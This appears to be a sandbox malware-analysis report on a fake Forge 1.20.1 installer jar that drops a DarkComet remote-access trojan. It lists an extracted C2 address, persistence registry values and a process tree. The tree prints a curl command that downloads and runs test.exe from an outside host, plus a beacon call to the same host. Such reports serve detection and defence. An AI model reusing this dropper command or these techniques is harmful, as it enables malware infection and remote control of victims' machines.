Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
15-12-2024 00:32
Static task
static1
Behavioral task
behavioral1
Sample
forge-1.20.1-47.1.12-installer.jar
Resource
win10ltsc2021-20241211-en
General
-
Target
forge-1.20.1-47.1.12-installer.jar
-
Size
5.7MB
-
MD5
6d0b8a01ecfdf53f577e5c2a1da491ec
-
SHA1
846e02191e94c181de3b9f28a589860625af3d18
-
SHA256
18fb6ed230d147195ae6243f309bfa9aa8768e707819ddc362ff83f594f4f20c
-
SHA512
659940064f9493117aede8ecf8f3dfa2bf847368fa661e08cc27b0c22599ea36d6f0e3597f225a41a02105a03b409b8efd8e675f9468ca117b15a9500c98f3a0
-
SSDEEP
98304:G7M/HfSDrRAoX4xUi7y0t5w4y2cTt6G8hZbCdm/j02G+uyXYsro0UaGJb:QrHox0az+Ttj8zoQuQUVb
Malware Config
Extracted
darkcomet
GoogleDebugger
147.185.221.24:14161
RO_MUTEX-8HU43EZ
-
InstallPath
ChromeCookies\ChromeCookie.exe
-
gencode
WN0BLB8aPxBw
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
GoogleDebugJ
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 788 attrib.exe 3000 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 2 IoCs
pid Process 4348 test.exe 3552 ChromeCookie.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" ChromeCookie.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3552 set thread context of 3572 3552 ChromeCookie.exe 106 -
resource yara_rule behavioral1/files/0x002900000004655d-15.dat upx behavioral1/memory/4348-17-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3572-20-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3552-22-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4348-25-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1968 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ test.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4348 test.exe Token: SeSecurityPrivilege 4348 test.exe Token: SeTakeOwnershipPrivilege 4348 test.exe Token: SeLoadDriverPrivilege 4348 test.exe Token: SeSystemProfilePrivilege 4348 test.exe Token: SeSystemtimePrivilege 4348 test.exe Token: SeProfSingleProcessPrivilege 4348 test.exe Token: SeIncBasePriorityPrivilege 4348 test.exe Token: SeCreatePagefilePrivilege 4348 test.exe Token: SeBackupPrivilege 4348 test.exe Token: SeRestorePrivilege 4348 test.exe Token: SeShutdownPrivilege 4348 test.exe Token: SeDebugPrivilege 4348 test.exe Token: SeSystemEnvironmentPrivilege 4348 test.exe Token: SeChangeNotifyPrivilege 4348 test.exe Token: SeRemoteShutdownPrivilege 4348 test.exe Token: SeUndockPrivilege 4348 test.exe Token: SeManageVolumePrivilege 4348 test.exe Token: SeImpersonatePrivilege 4348 test.exe Token: SeCreateGlobalPrivilege 4348 test.exe Token: 33 4348 test.exe Token: 34 4348 test.exe Token: 35 4348 test.exe Token: 36 4348 test.exe Token: SeIncreaseQuotaPrivilege 3552 ChromeCookie.exe Token: SeSecurityPrivilege 3552 ChromeCookie.exe Token: SeTakeOwnershipPrivilege 3552 ChromeCookie.exe Token: SeLoadDriverPrivilege 3552 ChromeCookie.exe Token: SeSystemProfilePrivilege 3552 ChromeCookie.exe Token: SeSystemtimePrivilege 3552 ChromeCookie.exe Token: SeProfSingleProcessPrivilege 3552 ChromeCookie.exe Token: SeIncBasePriorityPrivilege 3552 ChromeCookie.exe Token: SeCreatePagefilePrivilege 3552 ChromeCookie.exe Token: SeBackupPrivilege 3552 ChromeCookie.exe Token: SeRestorePrivilege 3552 ChromeCookie.exe Token: SeShutdownPrivilege 3552 ChromeCookie.exe Token: SeDebugPrivilege 3552 ChromeCookie.exe Token: SeSystemEnvironmentPrivilege 3552 ChromeCookie.exe Token: SeChangeNotifyPrivilege 3552 ChromeCookie.exe Token: SeRemoteShutdownPrivilege 3552 ChromeCookie.exe Token: SeUndockPrivilege 3552 ChromeCookie.exe Token: SeManageVolumePrivilege 3552 ChromeCookie.exe Token: SeImpersonatePrivilege 3552 ChromeCookie.exe Token: SeCreateGlobalPrivilege 3552 ChromeCookie.exe Token: 33 3552 ChromeCookie.exe Token: 34 3552 ChromeCookie.exe Token: 35 3552 ChromeCookie.exe Token: 36 3552 ChromeCookie.exe Token: SeIncreaseQuotaPrivilege 3572 iexplore.exe Token: SeSecurityPrivilege 3572 iexplore.exe Token: SeTakeOwnershipPrivilege 3572 iexplore.exe Token: SeLoadDriverPrivilege 3572 iexplore.exe Token: SeSystemProfilePrivilege 3572 iexplore.exe Token: SeSystemtimePrivilege 3572 iexplore.exe Token: SeProfSingleProcessPrivilege 3572 iexplore.exe Token: SeIncBasePriorityPrivilege 3572 iexplore.exe Token: SeCreatePagefilePrivilege 3572 iexplore.exe Token: SeBackupPrivilege 3572 iexplore.exe Token: SeRestorePrivilege 3572 iexplore.exe Token: SeShutdownPrivilege 3572 iexplore.exe Token: SeDebugPrivilege 3572 iexplore.exe Token: SeSystemEnvironmentPrivilege 3572 iexplore.exe Token: SeChangeNotifyPrivilege 3572 iexplore.exe Token: SeRemoteShutdownPrivilege 3572 iexplore.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3572 iexplore.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 4288 wrote to memory of 3816 4288 java.exe 90 PID 4288 wrote to memory of 3816 4288 java.exe 90 PID 4288 wrote to memory of 4452 4288 java.exe 91 PID 4288 wrote to memory of 4452 4288 java.exe 91 PID 4452 wrote to memory of 2452 4452 cmd.exe 95 PID 4452 wrote to memory of 2452 4452 cmd.exe 95 PID 3816 wrote to memory of 2772 3816 cmd.exe 94 PID 3816 wrote to memory of 2772 3816 cmd.exe 94 PID 3816 wrote to memory of 4348 3816 cmd.exe 97 PID 3816 wrote to memory of 4348 3816 cmd.exe 97 PID 3816 wrote to memory of 4348 3816 cmd.exe 97 PID 3816 wrote to memory of 1968 3816 cmd.exe 98 PID 3816 wrote to memory of 1968 3816 cmd.exe 98 PID 4348 wrote to memory of 3756 4348 test.exe 99 PID 4348 wrote to memory of 3756 4348 test.exe 99 PID 4348 wrote to memory of 3756 4348 test.exe 99 PID 4348 wrote to memory of 2284 4348 test.exe 101 PID 4348 wrote to memory of 2284 4348 test.exe 101 PID 4348 wrote to memory of 2284 4348 test.exe 101 PID 3756 wrote to memory of 788 3756 cmd.exe 103 PID 3756 wrote to memory of 788 3756 cmd.exe 103 PID 3756 wrote to memory of 788 3756 cmd.exe 103 PID 2284 wrote to memory of 3000 2284 cmd.exe 104 PID 2284 wrote to memory of 3000 2284 cmd.exe 104 PID 2284 wrote to memory of 3000 2284 cmd.exe 104 PID 4348 wrote to memory of 3552 4348 test.exe 105 PID 4348 wrote to memory of 3552 4348 test.exe 105 PID 4348 wrote to memory of 3552 4348 test.exe 105 PID 3552 wrote to memory of 3572 3552 ChromeCookie.exe 106 PID 3552 wrote to memory of 3572 3552 ChromeCookie.exe 106 PID 3552 wrote to memory of 3572 3552 ChromeCookie.exe 106 PID 3552 wrote to memory of 3572 3552 ChromeCookie.exe 106 PID 3552 wrote to memory of 3572 3552 ChromeCookie.exe 106 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 PID 3572 wrote to memory of 2780 3572 iexplore.exe 107 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 788 attrib.exe 3000 attrib.exe -
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 3 curl/8.7.1 HTTP User-Agent header 4 curl/8.7.1
Processes
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\forge-1.20.1-47.1.12-installer.jar1⤵
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\SYSTEM32\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\system32\curl.execurl https://dontuseme.ct8.pl/test.exe3⤵PID:2772
-
-
C:\Users\Admin\AppData\Local\test.exeC:\Users\Admin\AppData\Local\test.exe3⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\test.exe" +s +h5⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local" +s +h5⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\notepad.exenotepad6⤵
- System Location Discovery: System Language Discovery
PID:2780
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:1968
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c "curl https://dontuseme.ct8.pl/setmsg.php?setMsg=someone+connected+gg"2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\curl.execurl https://dontuseme.ct8.pl/setmsg.php?setMsg=someone+connected+gg3⤵PID:2452
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5328,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:81⤵PID:3204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=3696,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4164 /prefetch:81⤵PID:3088
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5268,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=1308 /prefetch:81⤵PID:2888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=4212,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:81⤵PID:2496
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5428,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=3964 /prefetch:81⤵PID:2096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5408,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:81⤵PID:2452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5292,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:81⤵PID:1920
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=3144,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:81⤵PID:2036
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=5476,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:81⤵PID:3728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=3004,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4280 /prefetch:81⤵PID:2512
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD557bd4f73690590693b5b921f29679410
SHA1c2cb47bf602541043589e979f21c3d7c1698e3ac
SHA2568a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa
SHA51200b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318